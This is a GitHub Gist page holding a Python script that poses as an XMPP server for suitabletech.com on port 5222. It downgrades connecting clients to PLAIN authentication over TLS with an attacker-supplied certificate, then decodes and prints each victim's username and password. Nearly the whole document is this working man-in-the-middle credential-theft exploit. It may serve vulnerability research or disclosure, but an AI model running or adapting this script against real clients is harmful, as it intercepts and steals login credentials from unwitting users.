-
-
Save diogomonica/a24a7285f31804d37144 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys, socket, thread, ssl, re, base64 | |
HOST = '0.0.0.0' | |
PORT = 5222 | |
BUFFER = 2048 | |
message1 = '''<?xml version='1.0'?><stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' from='suitabletech.com' version='1.0' id='yzd6vaewp51cr4pppt8ub8rvuew5x2ev1r1x1gtr'>''' | |
message2 = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>''' | |
message2tls = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>''' | |
message3 = '''<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>r.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>''' | |
def mitm_thread(victim, certificate, private_key): | |
try: | |
# Receive initial message from client | |
pkt = victim.recv(BUFFER) | |
print "# Received from victim: %s" % pkt.rstrip() | |
# Send initial message and starttls with PLAIN | |
victim.send(message1) | |
victim.send(message2tls) | |
# Receive STARTTLS | |
pkt = victim.recv(BUFFER) | |
print "# Received from victim: %s" % pkt.rstrip() | |
# Proceed! | |
victim.send(message3) | |
print "# Victim connection switched to TLS" | |
ssl_socket = ssl.wrap_socket(victim, server_side=True, suppress_ragged_eofs=False, certfile=certificate, keyfile=private_key) | |
try: | |
pkt = ssl_socket.recv(BUFFER) | |
print "# Received from victim: %s" % pkt.rstrip() | |
# Send initial message and PLAIN | |
ssl_socket.send(message1) | |
ssl_socket.send(message2) | |
# We should now receive the credentials base64-encoded | |
authblock = ssl_socket.recv(BUFFER) | |
print "# Received from victim: %s" % authblock.rstrip() | |
if authblock != '': | |
credentials_xml = re.search('>(.+)</auth>',authblock).group(1) | |
credentials = base64.b64decode(credentials_xml).split('\x00') | |
print "# Found credentials.\n Username: %s\n Password: %s" % (credentials[1],credentials[2]) | |
victim.close() | |
else: | |
print "Something went wrong with our TLS certificate" | |
ssl_socket.close() | |
except Exception as e: | |
print "Error inside our TLS socket: ", e | |
ssl_socket.close() | |
return | |
except Exception as e: | |
print "Error:", e | |
victim.close() | |
if __name__=='__main__': | |
if len(sys.argv) != 3: | |
sys.exit('Usage: %s <certificate> <private_key>\nExample: %s suitabletech.com.pem suitabletech.com.key' % (sys.argv[0], sys.argv[0])) | |
certificate = sys.argv[1] | |
private_key = sys.argv[2] | |
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
server.bind((HOST, PORT)) | |
server.listen(2) | |
print "Started fake XMPP Server on port %s" % PORT | |
try: | |
while True: | |
victim, address = server.accept() | |
print "New Victim connected: %s" % address[0] | |
thread.start_new_thread(mitm_thread, (victim, certificate, private_key)) | |
except KeyboardInterrupt: | |
server.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment